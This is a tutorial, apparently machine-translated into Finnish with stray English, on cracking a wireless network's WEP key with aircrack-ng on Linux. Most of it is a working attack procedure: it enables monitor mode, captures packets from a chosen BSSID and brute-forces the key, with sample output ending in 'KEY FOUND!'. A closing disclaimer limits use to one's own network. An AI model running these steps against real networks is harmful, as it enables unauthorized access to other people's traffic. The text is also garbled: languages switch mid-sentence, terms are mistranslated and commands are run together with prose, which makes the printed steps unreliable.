This article piakkoin describes simple steps on how to crack a wireless WEP key using Air Crack-ng software. Tämä voidaan tehdä haistelemalla langatonta verkkoa, kaappaamalla salattuja paketteja ja ajamalla sopivaa salauksen murtamisohjelmaa, kun yritetään purkaa salattua dataa. WEP (Wired Equivalent Privacy) on melko helppo murtaa, koska se käyttää vain yhtä avainta kaiken liikenteen salaamiseen.
perusperiaate on, että kahden verkon solmun välinen viestintä perustuu MAC-osoitteeseen. Jokainen isäntä vastaanottaa vain oman käyttöliittymänsä MAC-osoitteeseen tarkoitettuja paketteja. Sama periaate pätee myös langattomiin verkkoihin. Jos yksi solmu kuitenkin asettaa Oman verkkokorttinsa siveettömään tilaan, se saa myös paketteja, joille ei ole osoitettu omaa MAC-osoitetta.
murtaakseen WEP-avaimen hakkerin täytyy kaapata näytepaketit, joita ei ole tarkoitettu omaan verkkoliittymäänsä, ja ajaa crack-ohjelma, jossa testiavaimia verrataan kaapattujen pakettien kanssa niputettuun WEP-avaimeen salauksen purkuyrityksessä. Avain, joka sopii kaapattujen pakettien purkamiseen, on avain, jota langaton verkko käyttää salatakseen koko langattoman viestintänsä yhdistetyillä asemillaan.
seuraavissa osioissa opastamme sinut Linuxissa tapahtuvan Aircrack-ng-asennuksen läpi ja näytämme sitten askel askeleelta ohjeet langattoman WEP-avaimen murtamiseen. Opas olettaa, että sinulla on langaton verkkokortti asennettuna ja että se tukee monitoritilaa.
tässä opetusohjelmassa opit:
- Kuinka asentaa aircrack-ng suuriin Linux-distroihin
- miten murtaa langaton WEP-avain aircrack-ng: llä
| Luokka | käytetyt vaatimukset, käytännöt tai ohjelmistoversio |
|---|---|
| järjestelmä | mikä tahansa Linux-distro |
| ohjelmisto | aircrack-ng |
| muut | etuoikeutettu pääsy Linux-järjestelmään pääkäyttäjänä tai sudo – komennon kautta. |
| konventiot | # – vaatii annettuja linux-komentoja suoritettavaksi root-oikeuksilla joko suoraan pääkäyttäjänä tai käyttämällä sudo komentoa$ – vaatii annettuja linux-komentoja suoritettavaksi tavallisena ei-etuoikeutettuna käyttäjänä |
Asenna aircrack-ng suuriin Linux-distroihin
päästäksesi alkuun tarvitset järjestelmääsi asennetun aircrack-ng-ohjelmiston. Voit käyttää alla olevaa sopivaa komentoa ohjelman asentamiseen järjestelmäsi paketinhallinnan avulla.
asentaa aircrack-ng Ubuntuun, Debianiin ja Linux Mintiin:
$ sudo apt install aircrack-ng
Aircrack-ng: n asentaminen Centosiin, Fedoraan, Almalinuxiin ja Red Hat: iin:
$ sudo dnf install aircrack-ng
Aircrack-ng: n asentaminen Arch Linuxiin ja Manjaroon:
$ sudo pacman -S aircrack-ng
Crack wireless WEP key
- First we need to identify the name of our wireless network interface. Jos langattoman verkon korttisi on asennettu oikein, komento
iwconfigpaljastaa langattoman verkkoliittymäsi nimen:$ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
lähtö osoittaa, että meidän tapauksessamme rajapinnan nimi on
wlan0. - ota seuraavaksi käyttöön näyttötila langattomalle käyttöliittymälle.
# airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)
komennon tulos antaa uuden virtuaaliliittymän nimen. Se on yleensä
mon0. - dumppaa näytön tulokset päätelaitteeseen, niin näet ne.
# airodump-ng mon0
voit nähdä taulukon oman alueesi langattomiin verkkoihin liittyvistä tiedoista. Tarvitset vain tietoa verkostosta, jonka haluat murtaa. Etsi se ja huomaa BSSID ja kanava, jolla se on.
- seuraavaksi kirjaat skannauksen tulokset tiedostoon. Aircrack tarvitsee tätä lokia suorittaakseen brute force-hyökkäyksen verkkoon myöhemmin. Saadaksesi kaappauksen, aiot suorittaa saman komennon kuin aiemmin, mutta määrität BSSID, kanava, ja lokin sijainti.
# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
täytä todelliset tietosi ennen komennon suorittamista ja jätä se suoritettavaksi.
- viimeisenä vaiheena murramme WEP-avaimen kaapattujen pakettien ja aircrack-ng-komennon avulla. Kaikki kaapatut paketit on nyt tallennettu
wep-crack-01.cap– tiedostoon.# aircrack-ng -z wep-crack-01.cap
tuotoksesi pitäisi näyttää jokseenkin tältä:
Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
Loppuhuomautukset
tässä oppaassa näimme, miten Aircrack-ng asennetaan Linuxiin ja ohjelmiston avulla murtaudutaan langattomaan WEP-avaimeen. Muista, että tätä prosessia tulisi käyttää vain oman turvallisuuden testaamiseen tai opetustarkoituksiin. Sen käyttäminen jonkun toisen verkossa on laitonta.